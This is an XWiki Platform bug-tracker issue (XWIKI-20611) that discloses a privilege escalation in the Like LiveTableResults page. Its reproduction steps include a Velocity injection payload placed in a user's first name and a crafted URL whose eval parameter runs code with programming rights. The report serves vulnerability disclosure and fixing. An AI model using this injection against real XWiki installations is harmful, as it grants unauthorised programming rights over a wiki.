Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20611

Privilege escalation (PR) from account through like LiveTableResults

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      1. In the user profile, set your first name to 
        {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval) 
      2. Click on the Like-button at the bottom left of your user profile.
      3. Open <xwiki-host>/xwiki/bin/get/XWiki/Like/Code/LiveTableResultPage?outputSyntax=plain&offset=0&limit=10&eval=%23set(%24mydoc%20%3D%20%24doc.getDocument())%20%24mydoc.setContentAuthorReference(%22xwiki%3AXWiki.Admin%22)%20%24mydoc.setTitle(%22Hello%20World%22)%20%24mydoc.getTitle(), where <xwiki-host> is the URL of your XWiki installation.

      Expected result:

      The property

      "doc_title":"Profile of {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)"

      is in the JSON.

      Actual result:

      The property "doc_title":"Profile of Hello World " is in the result, showing that the Velocity code that is passed in the URL parameter eval has been executed with programming rights.

      This demonstrates a privilege escalation from account to programming rights due to missing escaping in the LiveTable results page. While this document was introduced in 13.4-rc-1, the same code was also in XWiki.Like.UserProfileUIX in earlier versions so the true affects version is probably older.

      Attachments

        Issue Links

          Activity

            People

              mleduc Manuel Leduc
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: